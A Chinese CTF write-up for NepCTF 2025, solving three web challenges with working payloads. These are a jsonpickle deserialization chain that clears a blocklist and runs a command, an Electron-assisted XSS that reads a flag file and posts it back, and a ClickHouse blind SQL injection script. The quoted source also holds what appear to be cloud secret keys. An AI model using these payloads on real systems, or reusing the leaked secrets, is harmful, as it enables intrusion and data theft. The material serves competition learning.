Skip to content

NepCTF 2025 WP

约 3025 字大约 10 分钟

CTF

2025-07-31

简单题懒得写,难的题有点牢,最近闲下来有时间写了

safe_bank

注册之后拿到 cookie 解码后很明显有能打反序列化的感觉,查了下和去年强网决赛那个差不多,都是 jsonpickle ,试了几个发现 waf 基本都拦了,读一下源码,参考从源码看JsonPickle反序列化利用与绕WAF,呃呃第一次发现 python 对于这个双引号和单引号居然会解析出现问题,得改成双引号

image-20250731055325563

{"py/object": "__main__.Session", "meta": {"user":{"py/object": "linecache.getlines", "py/newargs": ["/app/app.py"]}, "ts": 1753911432}}
from flask import Flask, request, make_response, render_template, redirect, url_for
import jsonpickle
import base64
import json
import os
import time

app = Flask(__name__)
app.secret_key = os.urandom(24)

class Account:
    def __init__(self, uid, pwd):
        self.uid = uid
        self.pwd = pwd

class Session:
    def __init__(self, meta):
        self.meta = meta

users_db = [
    Account("admin", os.urandom(16).hex()),
    Account("guest", "guest")
]

def register_user(username, password):
    for acc in users_db:
        if acc.uid == username:
            return False
    users_db.append(Account(username, password))
    return True

FORBIDDEN = [
    'builtins', 'os', 'system', 'repr', '__class__', 'subprocess', 'popen', 'Popen', 'nt',
    'code', 'reduce', 'compile', 'command', 'pty', 'platform', 'pdb', 'pickle', 'marshal',
    'socket', 'threading', 'multiprocessing', 'signal', 'traceback', 'inspect', '\\\\', 'posix',
    'render_template', 'jsonpickle', 'cgi', 'execfile', 'importlib', 'sys', 'shutil', 'state',
    'import', 'ctypes', 'timeit', 'input', 'open', 'codecs', 'base64', 'jinja2', 're', 'json',
    'file', 'write', 'read', 'globals', 'locals', 'getattr', 'setattr', 'delattr', 'uuid',
    '__import__', '__globals__', '__code__', '__closure__', '__func__', '__self__', 'pydoc',
    '__module__', '__dict__', '__mro__', '__subclasses__', '__init__', '__new__'
]

def waf(serialized):
    try:
        data = json.loads(serialized)
        payload = json.dumps(data, ensure_ascii=False)
        for bad in FORBIDDEN:
            if bad in payload:
                return bad
        return None
    except:
        return "error"

@app.route('/')
def root():
    return render_template('index.html')

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        confirm_password = request.form.get('confirm_password')
        
        if not username or not password or not confirm_password:
            return render_template('register.html', error="所有字段都是必填的。")
        
        if password != confirm_password:
            return render_template('register.html', error="密码不匹配。")
        
        if len(username) < 4 or len(password) < 6:
            return render_template('register.html', error="用户名至少需要4个字符,密码至少需要6个字符。")
        
        if register_user(username, password):
            return render_template('index.html', message="注册成功!请登录。")
        else:
            return render_template('register.html', error="用户名已存在。")
    
    return render_template('register.html')

@app.post('/auth')
def auth():
    u = request.form.get("u")
    p = request.form.get("p")
    for acc in users_db:
        if acc.uid == u and acc.pwd == p:
            sess_data = Session({'user': u, 'ts': int(time.time())})
            token_raw = jsonpickle.encode(sess_data)
            b64_token = base64.b64encode(token_raw.encode()).decode()
            resp = make_response("登录成功。")
            resp.set_cookie("authz", b64_token)
            resp.status_code = 302
            resp.headers['Location'] = '/panel'
            return resp
    return render_template('index.html', error="登录失败。用户名或密码无效。")

@app.route('/panel')
def panel():
    token = request.cookies.get("authz")
    if not token:
        return redirect(url_for('root', error="缺少Token。"))
    
    try:
        decoded = base64.b64decode(token.encode()).decode()
    except:
        return render_template('error.html', error="Token格式错误。")
    
    ban = waf(decoded)
    if ban:
        return render_template('error.html', error=f"请不要黑客攻击!{ban}")
    
    try:
        sess_obj = jsonpickle.decode(decoded, safe=True)
        meta = sess_obj.meta
        
        if meta.get("user") != "admin":
            return render_template('user_panel.html', username=meta.get('user'))
        
        return render_template('admin_panel.html')
    except Exception as e:
        return render_template('error.html', error=f"数据解码失败。")

@app.route('/vault')
def vault():
    token = request.cookies.get("authz")
    if not token:
        return redirect(url_for('root'))
    
    try:
        decoded = base64.b64decode(token.encode()).decode()
        if waf(decoded):
            return render_template('error.html', error="请不要尝试黑客攻击!")
        sess_obj = jsonpickle.decode(decoded, safe=True)
        meta = sess_obj.meta
        
        if meta.get("user") != "admin":
            return render_template('error.html', error="访问被拒绝。只有管理员才能查看此页面。")
        
        flag = "NepCTF{fake_flag_this_is_not_the_real_one}"
        return render_template('vault.html', flag=flag)
    except:
        return redirect(url_for('root'))

@app.route('/about')
def about():
    return render_template('about.html')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000, debug=False)

不是很会审计 python 这些库的源代码,抽空研究下调用,不像 Java 那么规范,抄一下LamentXU

py的trick真是太多了,把黑名单删掉

{"py/object": "__main__.Session", "meta": {"user": {"py/object":"__main__.FORBIDDEN.clear","py/newargs": []},"ts":123456789}}

然后随便 RCE

{"py/object": "__main__.Session", "meta": {"user": {"py/object":"subprocess.getoutput","py/newargs": ["/readflag"]},"ts":123456789}}

fake_xss

注册进去传个头像发现有 腾讯云 COS 的服务

image-20250804110244844

image-20250804110257200

在桶里面拿到后端代码

const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const tencentcloud = require("tencentcloud-sdk-nodejs");
const path = require('path');
const fs = require('fs');
const { v4: uuidv4 } = require('uuid');
const { execFile } = require('child_process');
const he = require('he');


const app = express();
const PORT = 3000;

app.use((req, res, next) => {
  res.setHeader('Access-Control-Allow-Origin', '*');
  res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE');
  res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
  res.setHeader('Access-Control-Allow-Credentials', 'true');
  next();
});

// 配置会话
app.use(session({
  secret: 'ctf-secret-key_023dfpi0e8hq',
  resave: false,
  saveUninitialized: true,
  cookie: { secure: false , httpOnly: false}
}));

app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.static(path.join(__dirname, 'public')));

// 用户数据库
const users = {'admin': { password: 'nepn3pctf-game2025', role: 'admin', uuid: uuidv4(), bio: '' }};
// 存储登录页面背景图片 URL
let loginBgUrl = '';

// STS 客户端配置
const StsClient = tencentcloud.sts.v20180813.Client;
const clientConfig = {
  credential: {
    secretId: "AKIDRaszDXeZJin6JHbjeOjLQL3Yp4EAvR",
    secretKey: "NXUDi2B7rONBU8IF4pZ9d9AndjSzKRN6",
  },
  region: "ap-guangzhou",
  profile: {
    httpProfile: {
      endpoint: "sts.tencentcloudapi.com",
    },
  },
};
const client = new StsClient(clientConfig);

// 注册接口
app.post('/api/register', (req, res) => {
  const { username, password } = req.body;
  if (users[username]) {
    return res.status(409).json({ success: false, message: '用户名已存在' });
  }
  const uuid = uuidv4();
  users[username] = { password, role: 'user', uuid, bio: '' };
  res.json({ success: true, message: '注册成功' });
});

// 登录页面
app.get('/', (req, res) => {
  let loginHtml = fs.readFileSync(path.join(__dirname, 'public', 'login.html'), 'utf8');
  if (loginBgUrl) {
    const key = loginBgUrl.replace('/uploads/', 'uploads/');
    const fileUrl = `http://ctf.mudongmudong.com/${key}`;

    const iframeHtml = `<iframe id="backgroundframe" src="${fileUrl}" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -1; border: none;"></iframe>`;
    loginHtml = loginHtml.replace('</body>', `${iframeHtml}</body>`);
  }
  res.send(loginHtml);
});



// 登录接口
app.post('/api/login', (req, res) => {
  const { username, password } = req.body;
  const user = users[username];

  if (user && user.password === password) {
    req.session.user = { username, role: user.role, uuid: user.uuid };
    res.json({ success: true, role: user.role });
  } else {
    res.status(401).json({ success: false, message: '认证失败' });
  }
});

// 检查用户是否已登录
function ensureAuthenticated(req, res, next) {
  if (req.session.user) {
    next();
  } else {
    res.status(401).json({ success: false, message: '请先登录' });
  }
}

// 获取用户信息
app.get('/api/user', ensureAuthenticated, (req, res) => {
  const user = users[req.session.user.username];
  res.json({ username: req.session.user.username, role: req.session.user.role, uuid: req.session.user.uuid, bio: user.bio });
});

// 获取头像临时密钥
app.get('/api/avatar-credentials', ensureAuthenticated, async (req, res) => {
  const params = {
    Policy: JSON.stringify({
      version: "2.0",
      statement: [
        {
          effect: "allow",
          action: ["cos:PutObject"],
          resource: [
            `qcs::cos:ap-guangzhou:uid/1360802834:test-1360802834/picture/${req.session.user.uuid}.png`
          ],
          Condition: {
            numeric_equal: {
              "cos:request-count": 5
            },
            numeric_less_than_equal: {
              "cos:content-length": 10485760  // 10MB 大小限制
            }
          }
        },
        {
          effect: "allow",
          action: ["cos:GetBucket"],
          resource: [
            "qcs::cos:ap-guangzhou:uid/1360802834:test-1360802834/*"
          ]
        }
      ]
    }),
    DurationSeconds: 1800,
    Name: "avatar-upload-client"
  };

  try {
    const response = await client.GetFederationToken(params);
    const auth = Buffer.from(JSON.stringify(params.Policy)).toString('base64');
    res.json({ ...response.Credentials, auth });
  } catch (err) {
    console.error("获取头像临时密钥失败:", err);
    res.status(500).json({ error: '获取临时密钥失败' });
  }
});

// 获取文件上传临时密钥(管理员)
app.get('/api/file-credentials', ensureAuthenticated, async (req, res) => {
  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ error: '权限不足' });
  }

  const params = {
    Policy: JSON.stringify({
      version: "2.0",
      statement: [
        {
          effect: "allow",
          action: ["cos:PutObject"],
          resource: [
            `qcs::cos:ap-guangzhou:uid/1360802834:test-1360802834/uploads/${req.session.user.uuid}/*`
          ],
          Condition: {
            numeric_equal: {
              "cos:request-count": 5
            },
            numeric_less_than_equal: {
              "cos:content-length": 10485760  
            }
          }
        },
        {
          effect: "allow",
          action: ["cos:GetBucket"],
          resource: [
            "qcs::cos:ap-guangzhou:uid/1360802834:test-1360802834/*"
          ]
        }
      ]
    }),
    DurationSeconds: 1800,
    Name: "file-upload-client"
  };

  try {
    const response = await client.GetFederationToken(params);
    const auth = Buffer.from(JSON.stringify(params.Policy)).toString('base64');
    res.json({ ...response.Credentials, auth });
  } catch (err) {
    console.error("获取文件临时密钥失败:", err);
    res.status(500).json({ error: '获取临时密钥失败' });
  }
});

// 保存个人简介(做好 XSS 防护)
app.post('/api/save-bio', ensureAuthenticated, (req, res) => {
  const { bio } = req.body;
  const sanitizedBio = he.encode(bio);
  const user = users[req.session.user.username];
  user.bio = sanitizedBio;
  res.json({ success: true, message: '个人简介保存成功' });
});

// 退出登录
app.post('/api/logout', ensureAuthenticated, (req, res) => {
  req.session.destroy();
  res.json({ success: true });
});

// 设置登录页面背景
app.post('/api/set-login-bg', ensureAuthenticated, async (req, res) => {
  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ success: false, message: '权限不足' });
  }
  const { key } = req.body;
  bgURL = key;
  try {
    const fileUrl = `http://ctf.mudongmudong.com/${bgURL}`;
    const response = await fetch(fileUrl);
    if (response.ok) {
        const content = response.text();
    } else {
        console.error('获取文件失败:', response.statusText);
        return res.status(400).json({ success: false, message: '获取文件内容失败' });
    }
  } catch (error) {
      return res.status(400).json({ success: false, message: '打开文件失败' });
  }
  loginBgUrl = key;
  res.json({ success: true, message: '背景设置成功' });
});



app.get('/api/bot', ensureAuthenticated, (req, res) => {

  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ success: false, message: '权限不足' });
  }

  const scriptPath = path.join(__dirname, 'bot_visit');

  // bot 将会使用客户端软件访问 http://127.0.1:3000/ ,但是bot可不会带着他的秘密去访问哦

  execFile(scriptPath, ['--no-sandbox'], (error, stdout, stderr) => {
    if (error) {
      console.error(`bot visit fail: ${error.message}`);
      return res.status(500).json({ success: false, message: 'bot visit failed' });
    }

    console.log(`bot visit success:\n${stdout}`);
    res.json({ success: true, message: 'bot visit success' });
  });
});

// 下载客户端软件
app.get('/downloadClient', (req, res) => {
  const filePath = path.join(__dirname, 'client_setup.zip');

  if (!fs.existsSync(filePath)) {
    return res.status(404).json({ success: false, message: '客户端文件不存在' });
  }

  res.download(filePath, 'client_setup.zip', (err) => {
    if (err) {
      console.error('client download error: ', err);
      return res.status(500).json({ success: false, message: '下载失败' });
    } else {
    }
  });
});

// 启动服务器
app.listen(PORT, () => {
  console.log(`服务器运行在端口 ${PORT}`);
});

功能点不少,直接给了 admin 账密,找哪里能 XSS ,既然说 bot 会去访问根路由,那功能点只有那个设置主页面背景可利用了

app.get('/', (req, res) => {
  let loginHtml = fs.readFileSync(path.join(__dirname, 'public', 'login.html'), 'utf8');
  if (loginBgUrl) {
    const key = loginBgUrl.replace('/uploads/', 'uploads/');
    const fileUrl = `http://ctf.mudongmudong.com/${key}`;

    const iframeHtml = `<iframe id="backgroundframe" src="${fileUrl}" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -1; border: none;"></iframe>`;
    loginHtml = loginHtml.replace('</body>', `${iframeHtml}</body>`);
  }
  res.send(loginHtml);
});

fileUrl 直接拼接进去是可以 xss 的,fileUrl 来自之前上传图片后设置登录页面背景处,这里应该是异步操作导致的文件检查失效,可以传任意的 key 上去

app.post('/api/set-login-bg', ensureAuthenticated, async (req, res) => {
  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ success: false, message: '权限不足' });
  }
  const { key } = req.body;
  bgURL = key;
  try {
    const fileUrl = `http://ctf.mudongmudong.com/${bgURL}`;
    const response = await fetch(fileUrl);
    if (response.ok) {
        const content = response.text();
    } else {
        console.error('获取文件失败:', response.statusText);
        return res.status(400).json({ success: false, message: '获取文件内容失败' });
    }
  } catch (error) {
      return res.status(400).json({ success: false, message: '打开文件失败' });
  }
  loginBgUrl = key;
  res.json({ success: true, message: '背景设置成功' });
});

和之前 TPCTF 思路一样拼接出来 xss

image-20250804153642325

image-20250804153336648

现在就需要配合 electron 框架的本地客户端,拿 asar 解出来 js,web 🐕还是得见多识广一点

const { app, BrowserWindow, ipcMain } = require('electron');
const path = require('path');
const { exec } = require('child_process');

let mainWindow = null;

function createWindow() {
  mainWindow = new BrowserWindow({
    width: 1600,
    height: 1200,
    webPreferences: {
      preload: path.join(__dirname, 'preload.js'),
      contextIsolation: true,
    }
  });

  // 默认加载本地输入页面
  mainWindow.loadFile('index.html');
}

app.whenReady().then(createWindow);

// 接收用户输入的地址并加载它
ipcMain.handle('load-remote-url', async (event, url) => {

  if (mainWindow) {
    mainWindow.loadURL(url);
  }
});

ipcMain.handle('curl', async (event, url) => {
  return new Promise((resolve) => {

    const cmd = `curl -L "${url}"`;

    exec(cmd, (error, stdout, stderr) => {
      if (error) {
        return resolve({ success: false, error: error.message });
      }
      resolve({ success: true, data: stdout });
    });
  });
});

这里有两个接口,第一个是正常打开软件会使用的,第二个明显有漏洞,一开始想命令拼接,但是也不出网就算了

这里去调用第二个接口,然后 file 协议读 flag ,fetch 外带到简介保存那个路由,真是充满巧思的题目,拓展了我对于 xss 的理解

{"key":"anything\" onload=\"document.cookie='connect.sid=s%3Ao93qeMzwrfLvUBBxG94TsMckuo9-LdG0.97efDsrL5mM5bEOghQuLC1KUgn3CE4j9NEZpmQuTCes';window.electronAPI.curl('file:///flag').then(data=>{fetch('/api/save-bio',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({'bio':JSON.stringify(data)})})})\" anything=\""}

美中不足的就是这个题 bot 不是很好用,需要多发几次

sql

比赛看了两眼几乎没解就没再做了,后端数据库是 clickhouse,黑名单字符串如下 preg_match('/select.*from|(|or|and|union|except/is',$id),呃直接来逆向 exp 吧,利用特性将 from 放在 select 之前

id INTERSECT FROM system.databases AS inject JOIN users ON inject.name LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age"

后半部分转换成标准格式就易懂不少,只有当 ON 条件为真( If ),才返回 user

SELECT users.id, users.name, users.email, users.age
FROM system.databases AS inject
JOIN users ON inject.name LIKE '{pattern}'

ClickHouse 的 INTERSECT 子句返回两个查询结果的交集,要求:

  • 两个查询的列数量、类型和顺序一致。
  • 只返回两边查询中重复的记录。

所以当后半部分判断为真,才能和前面 id 查出来结果一致去回显

payload_template = "id INTERSECT FROM system.databases AS inject JOIN users ON inject.name LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age"
# 表
payload_template = "id INTERSECT FROM system.tables AS inject JOIN users ON inject.name LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age WHERE inject.database='nepnep'"
# 名
payload_template = "id INTERSECT FROM system.columns AS inject JOIN users ON inject.name LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age WHERE inject.table='nepnep'"

然后就是搓脚本去盲注,经常爆内存,太屎了,还 connect 不上去,能不能这种注入的题把 flag 弄短点呢?每次爆破比我做题时间还长

image-20250805115418605

image-20250805130021270

我的脚本写的还是不够好

import requests
import time
import urllib3

url = 'https://nepctf31-ns0z-nty9-kovg-kre0l9rpq623.nepctf.com:443' 
charset = '0123456789abcdefghijklmnopqrstuvwxyz-}'  
known_prefix = ''
max_len = 50  # 最长猜解长度
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# payload_template = (
#     "id INTERSECT FROM system.columns AS inject "
#     "JOIN users ON inject.name LIKE '{pattern}' "
#     "SELECT users.id, users.name, users.email, users.age WHERE inject.table='nepnep'"
# )
payload_template = "id INTERSECT FROM nepnep.nepnep AS inject JOIN users ON inject.`51@g_ls_h3r3` LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age"
proxies = {
    "http": "http://127.0.0.1:8060",
    "https": "http://127.0.0.1:8060", 
}

def is_match(response_text: str) -> bool:
    return '<div class="success">找到用户信息:</div>' in response_text

def is_exceed(response_text: str) -> bool:
    return '<div class="error">查询失败: (total) memory limit' in response_text


def extract_all_values():
    found_values = []
    prefix_candidates = ['NepCTF{']
    print("[*] Stage 1: Finding all valid first characters...")
    
    # 阶段1:找所有可能的前缀
    for ch in charset:
        pattern = ch + "%"
        payload = payload_template.format(pattern=pattern)
        data = {'id': payload}

        while True:
            try:
                response = requests.post(url, data=data, proxies=proxies, verify=False)
                time.sleep(5)
                if is_exceed(response.text):
                    time.sleep(5)
                    continue 
                break  

            except Exception as e:
                print(f"[!] Request error: {e}")
                return found_values
                    
        if is_match(response.text):
            print(f"[+] Valid starting char: {ch}")
            prefix_candidates.append(ch)

    print(f"[*] Stage 1 complete. Found {len(prefix_candidates)} starting points.")
    print(prefix_candidates)

    # 阶段2:对每个前缀分别执行爆破
    for prefix in prefix_candidates:
        known_prefix = prefix
        print(f"[*] Start blind extraction with prefix: {prefix}")

        for i in range(1, max_len): 
            found = False
            for ch in charset:
                try_prefix = known_prefix + ch
                pattern = try_prefix + "%"
                payload = payload_template.format(pattern=pattern)

                data = {'id': payload}
                while True:
                    try:
                        response = requests.post(url, data=data, proxies=proxies, verify=False)
                        time.sleep(5)  
                        if is_exceed(response.text):
                            # print("[!] Server overloaded, retrying")
                            time.sleep(5)
                            continue
                        break

                    except Exception as e:
                        print(f"[!] Request error: {e}")
                        return found_values

                if is_match(response.text):
                    print(f"[+] Valid char found at position {i+1}: {ch}")
                    known_prefix += ch
                    found = True
                    break  

            if not found:
                print("[!] No more matching character found, stopping at current position.")
                break  

        print(f"[✔] Extracted full value: {known_prefix}")
        found_values.append(known_prefix)

    return found_values

if __name__ == "__main__":
    extract_all_values()

参考文章

NepCTF 2025

nepctf 2025 web wp